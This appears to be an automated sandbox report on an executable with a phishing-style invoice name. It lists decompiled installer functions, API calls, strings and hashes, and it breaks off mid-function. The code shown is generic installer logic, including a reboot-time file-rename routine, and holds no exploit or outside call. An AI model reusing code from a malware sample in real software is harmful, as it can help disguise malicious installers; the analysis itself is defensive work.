API String ID:
Opcode ID: 3b8915623157b54b87ada7efdc4dd551f12713883e871558a34054c895e603b5
Instruction ID: de4fcd370046d09becd0580a426fcf81ba450acc40e34398557854fad23d6f5b
Opcode Fuzzy Hash: 3b8915623157b54b87ada7efdc4dd551f12713883e871558a34054c895e603b5
Instruction Fuzzy Hash: 5EC09B303517408FC755CE1DC1D0F4573E5BF40A60B9586A8F421879D5C754D8408500

Uniqueness

Uniqueness Score: -1.00%

Function 00404293 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00404293(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				char _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t108;
				signed int _t110;
				intOrPtr _t111;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L13:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x79ff0c =  *0x79ff0c + 1;
								__eflags =  *0x79ff0c;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040415D(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
								_t103 =  *((intOrPtr*)(_t114 + 0x1c));
								_t113 =  *((intOrPtr*)(_t114 + 0x18));
								_v12 = _t103;
								__eflags = _t103 - _t113 - 0x800;
								_v16 = _t113;
								_v8 = 0x7a69e0;
								if(_t103 - _t113 < 0x800) {
									SendMessageW(_t56, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorW(0, 0x7f02));
									_t44 =  &_v8; // 0x7a69e0
									ShellExecuteW(_a4, L"open",  *_t44, 0, 0, 1);
									SetCursor(LoadCursorW(0, 0x7f00));
									_t114 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x700;
						if( *((intOrPtr*)(_t114 + 8)) != 0x700) {
							goto L28;
						} else {
							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
								goto L28;
							}
							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x7a8a48, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x7a8a48, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L27;
					}
					__eflags =  *0x79ff0c; // 0x0
					if(__eflags != 0) {
						goto L27;
					}
					_t69 =  *0x7a0f18; // 0x9ab874
					_t29 = _t69 + 0x14; // 0x9ab888
					_t116 = _t29;
					__eflags =  *_t116 & 0x00000020;
					if(( *_t116 & 0x00000020) == 0) {
						goto L27;
					}
					_t108 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t108;
					 *_t116 = _t108;
					E00404118(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E00404526();
					goto L13;
				} else {
					_t117 = _a16;
					_t75 =  *(_t117 + 0x30);
					if(_t75 < 0) {
						_t111 =  *0x7a7a1c; // 0x9ae6de
						_t75 =  *(_t111 - 4 + _t75 * 4);
					}
					_t76 =  *0x7a8a78 + _t75 * 2;
					_t110 =  *_t76 & 0x0000ffff;
					_a8 = _t110;
					_t78 =  &(_t76[1]);
					_a16 = _t78;
					_v16 = _t78;
					_v12 = 0;
					_v8 = E00404244;
					if(_t110 != 2) {
						_v8 = E0040420A;
					}
					_push( *((intOrPtr*)(_t117 + 0x34)));
					_push(0x22);
					E004040F6(_a4);
					_push( *((intOrPtr*)(_t117 + 0x38)));
					_push(0x23);
					E004040F6(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E00404118( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
					_t118 = GetDlgItem(_a4, 0x3e8);
					E0040412B(_t118);
					SendMessageW(_t118, 0x45b, 1, 0);
					_t92 =  *( *0x7a8a50 + 0x68);
					if(_t92 < 0) {
						_t92 = GetSysColor( ~_t92);
					}
					SendMessageW(_t118, 0x443, 0, _t92);
					SendMessageW(_t118, 0x445, 0, 0x4010000);
					SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
					 *0x79ff0c = 0;
					SendMessageW(_t118, 0x449, _a8,  &_v16);
					 *0x79ff0c = 0;
					return 0;
				}
			}

0x004042a5
0x004043c5
0x004043d2
0x0040442f
0x0040442f
0x00404433
0x00404501
0x00404508
0x0040450a
0x0040450a
0x0040450a
0x00404510
0x00404510
0x00404513
0x00000000
0x0040451a
0x00404441
0x00404447
0x0040444a
0x00404451
0x00404453
0x0040445a
0x0040445c
0x0040445f
0x00404462
0x00404467
0x0040446d
0x00404470
0x00404477
0x00404484
0x00404495
0x0040449f
0x004044aa
0x004044b9
0x004044bf
0x004044bf
0x00404477
0x0040445a
0x004044c2
0x004044c9
0x00000000
0x004044cb
0x004044cb
0x004044d2
0x00000000
0x00000000
0x004044d4
0x004044d8
0x004044e8
0x004044e8
0x004044ea
0x004044ee
0x004044fa
0x004044fa
0x00000000
0x004044fe
0x004044c9
0x004043da
0x004043dd
0x00000000
0x00000000
0x004043e3
0x004043e9
0x00000000
0x00000000
0x004043ef
0x004043f4
0x004043f4
0x004043f7
0x004043fa
0x00000000
0x00000000
0x00404421
0x00404421
0x00404423
0x00404425
0x0040442a
0x00000000
0x004042ab
0x004042ab
0x004042ae
0x004042b3
0x004042b5
0x004042c4
0x004042c4
0x004042cc
0x004042cf
0x004042d3
0x004042d6
0x004042da
0x004042dd
0x004042e0
0x004042e3
0x004042ea
0x004042ec
0x004042ec
0x004042f6
0x00404303
0x0040430d
0x00404312
0x00404315
0x0040431a
0x00404331
0x00404338
0x0040434b
0x0040434e
0x00404362
0x00404369
0x0040436e
0x00404373
0x00404373
0x00404381
0x0040438f
0x004043a1
0x004043a6
0x004043b6
0x004043b8
0x00000000
0x004043be

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404331
GetDlgItem.USER32(?,000003E8), ref: 00404345
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404362
GetSysColor.USER32(?), ref: 00404373
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404381
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040438F
lstrlenW.KERNEL32(?), ref: 00404394
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043A1
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043B6
GetDlgItem.USER32(?,0000040A), ref: 0040440F
SendMessageW.USER32(00000000), ref: 00404416
GetDlgItem.USER32(?,000003E8), ref: 00404441
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404484
LoadCursorW.USER32(00000000,00007F02), ref: 00404492
SetCursor.USER32(00000000), ref: 00404495
ShellExecuteW.SHELL32(0000070B,open,iz,00000000,00000000,00000001), ref: 004044AA
LoadCursorW.USER32(00000000,00007F00), ref: 004044B6
SetCursor.USER32(00000000), ref: 004044B9
SendMessageW.USER32(00000111,00000001,00000000), ref: 004044E8
SendMessageW.USER32(00000010,00000000,00000000), ref: 004044FA

Strings

open, xrefs: 004044A2
iz, xrefs: 0040449F
N, xrefs: 0040442F

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: N$open$iz
API String ID: 3615053054-3184408566
Opcode ID: 01da6d32b2a417ec90abe3a2877bb8b4f20cf3725a55cc12a2a61828b7308d80
Instruction ID: f5fa6e7357a1776686f67c5c85bccc632f1e4afc8f648020f62b4c2f23f21bc2
Opcode Fuzzy Hash: 01da6d32b2a417ec90abe3a2877bb8b4f20cf3725a55cc12a2a61828b7308d80
Instruction Fuzzy Hash: CA7181B1900609BFDB109F60DD85E6A7B79FB84744F04853AF705B61E0CB789951CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405D61 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 131
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D61(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t13;
				long _t25;
				char* _t32;
				int _t38;
				void* _t39;
				intOrPtr* _t40;
				long _t43;
				WCHAR* _t45;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t54;

				_t39 = __ecx;
				lstrcpyW(0x7a55e0, L"NUL");
				_t45 =  *(_t53 + 0x18);
				if(_t45 == 0) {
					L3:
					_t2 = _t53 + 0x1c; // 0x7a5de0
					_t13 = GetShortPathNameW( *_t2, 0x7a5de0, 0x400);
					if(_t13 != 0 && _t13 <= 0x400) {
						_t38 = wsprintfA(0x7a51e0, "%ls=%ls\r\n", 0x7a55e0, 0x7a5de0);
						_t54 = _t53 + 0x10;
						E00406054(_t38, 0x400, 0x7a5de0, 0x7a5de0,  *((intOrPtr*)( *0x7a8a50 + 0x128)));
						_t13 = E00405C07(0x7a5de0, 0xc0000000, 4);
						_t49 = _t13;
						 *(_t54 + 0x18) = _t49;
						if(_t49 != 0xffffffff) {
							_t43 = GetFileSize(_t49, 0);
							_t6 = _t38 + 0xa; // 0xa
							_t47 = GlobalAlloc(0x40, _t43 + _t6);
							if(_t47 == 0 || E00405C8A(_t49, _t47, _t43) == 0) {
								L18:
								return CloseHandle(_t49);
							} else {
								if(E00405B6C(_t39, _t47, "[Rename]\r\n") != 0) {
									_t50 = E00405B6C(_t39, _t22 + 0xa, "\n[");
									if(_t50 == 0) {
										_t49 =  *(_t54 + 0x18);
										L16:
										_t25 = _t43;
										L17:
										E00405BC2(_t25 + _t47, 0x7a51e0, _t38);
										SetFilePointer(_t49, 0, 0, 0);
										E00405CB9(_t49, _t47, _t43 + _t38);
										GlobalFree(_t47);
										goto L18;
									}
									_t40 = _t47 + _t43;
									_t32 = _t40 + _t38;
									while(_t40 > _t50) {
										 *_t32 =  *_t40;
										_t32 = _t32 - 1;
										_t40 = _t40 - 1;
									}
									_t25 = _t50 - _t47 + 1;
									_t49 =  *(_t54 + 0x18);
									goto L17;
								}
								lstrcpyA(_t47 + _t43, "[Rename]\r\n");
								_t43 = _t43 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405C07(_t45, 0, 1));
					_t13 = GetShortPathNameW(_t45, 0x7a55e0, 0x400);
					if(_t13 != 0 && _t13 <= 0x400) {
						goto L3;
					}
				}
				return _t13;
			}

0x00405d61
0x00405d70
0x00405d76
0x00405d87
0x00405daf
0x00405db6
0x00405dba
0x00405dbe
0x00405dde
0x00405de5
0x00405def
0x00405dfc
0x00405e01
0x00405e06
0x00405e0a
0x00405e19
0x00405e1b
0x00405e28
0x00405e2c
0x00405ec7
0x00000000
0x00405e42
0x00405e4f
0x00405e73
0x00405e77
0x00405e96
0x00405e9a
0x00405e9a
0x00405e9c
0x00405ea5
0x00405eb0
0x00405ebb
0x00405ec1
0x00000000
0x00405ec1
0x00405e79
0x00405e7c
0x00405e87
0x00405e83
0x00405e85
0x00405e86
0x00405e86
0x00405e8e
0x00405e90
0x00000000
0x00405e90
0x00405e5a
0x00405e60
0x00000000
0x00405e60
0x00405e2c
0x00405e0a
0x00405d89
0x00405d94
0x00405d9d
0x00405da1
0x00000000
0x00000000
0x00405da1
0x00405ed2

APIs

lstrcpyW.KERNEL32(007A55E0,NUL), ref: 00405D70
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405EF4,?,?), ref: 00405D94
GetShortPathNameW.KERNEL32(?,007A55E0,00000400), ref: 00405D9D

Part of subcall function 00405B6C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E4D,00000000,[Rename],00000000,00000000,00000000), ref: 00405B7C
Part of subcall function 00405B6C: lstrlenA.KERNEL32(00000000,?,00000000,00405E4D,00000000,[Rename],00000000,00000000,00000000), ref: 00405BAE

GetShortPathNameW.KERNEL32(]z,007A5DE0,00000400), ref: 00405DBA
wsprintfA.USER32 ref: 00405DD8
GetFileSize.KERNEL32(00000000,00000000,007A5DE0,C0000000,00000004,007A5DE0,?), ref: 00405E13
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405E22
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405E5A
SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,007A51E0,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB0
GlobalFree.KERNEL32(00000000), ref: 00405EC1
CloseHandle.KERNEL32(00000000), ref: 00405EC8

Part of subcall function 00405C07: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,80000000,00000003,?,?,00000000,00403517,?), ref: 00405C0B
Part of subcall function 00405C07: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,00403517,?), ref: 00405C2D

Strings

NUL, xrefs: 00405D6A
%ls=%ls, xrefs: 00405DCE
Uz, xrefs: 00405D65
[Rename], xrefs: 00405E42, 00405E54
]z, xrefs: 00405DAF
]z, xrefs: 00405DB6

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %ls=%ls$NUL$[Rename]$Uz$]z$]z
API String ID: 222337774-2882615421
Opcode ID: 96167ce44ddedef176c8bff3fbbd2245610190e2ff8f9a1c8bc4a62397111b78
Instruction ID: 75cee4360bd3bcd07888cd864a4516e3a0162a31efabfd5f0f4b5e85420b189e
Opcode Fuzzy Hash: 96167ce44ddedef176c8bff3fbbd2245610190e2ff8f9a1c8bc4a62397111b78
Instruction Fuzzy Hash: 6C31F370600B14BBD2216B219D49F6B3E6CDF45755F14043AFA81F62D2DA3CEA018EAD

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a8a50;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, "Overcaustically Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8a48;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,Overcaustically Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

Overcaustically Setup, xrefs: 00401150
F, xrefs: 0040100C

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$Overcaustically Setup
API String ID: 941294808-1772504776
Opcode ID: ce6bfb0b893aacce883330537bc8e63ee4883ce97208896732d7138368f4d8d8
Instruction ID: de39ae593db74bf8e739f7026f96e360392c145d264594217dd326fc860e90c0
Opcode Fuzzy Hash: ce6bfb0b893aacce883330537bc8e63ee4883ce97208896732d7138368f4d8d8
Instruction Fuzzy Hash: E2418C71800209AFCF058F95DE459AFBBB9FF45310F00842EF991AA1A0CB38DA54DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 004062C6 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004062C6(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405A5D(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405A13(L"*?|<>/\":", _t5))) == 0) {
							E00405BC2(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004062c8
0x004062d1
0x004062e8
0x004062e8
0x004062ef
0x004062fb
0x004062fb
0x004062fe
0x00406301
0x00406306
0x00406308
0x00406311
0x00406315
0x00406332
0x0040633a
0x0040633a
0x0040633f
0x00406341
0x00406344
0x00406349
0x0040634a
0x0040634e
0x0040634e
0x0040634f
0x00406356
0x00406358
0x0040635f
0x00000000
0x00000000
0x00406367
0x0040636d
0x00000000
0x00000000
0x00000000
0x0040636d
0x00406372

APIs

CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",762E3420,C:\Users\user\AppData\Local\Temp\,00000000,00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A9), ref: 00406329
CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 00406338
CharNextW.USER32(0040A300,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",762E3420,C:\Users\user\AppData\Local\Temp\,00000000,00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A9), ref: 0040633D
CharPrevW.USER32(0040A300,0040A300,762E3420,C:\Users\user\AppData\Local\Temp\,00000000,00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A9), ref: 00406350

Strings

*?|<>/":, xrefs: 00406318
"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", xrefs: 0040630A
C:\Users\user\AppData\Local\Temp\, xrefs: 004062C7

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-413170847
Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
Instruction ID: d4b317f752b3f13875bb624486170839a033bb9266efc580798c69349bd43794
Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
Instruction Fuzzy Hash: 4611041580061295DB307B148D40AB7A2B8FF95754F42803FED86732C0E77C9CA286ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040415D Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040415D(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
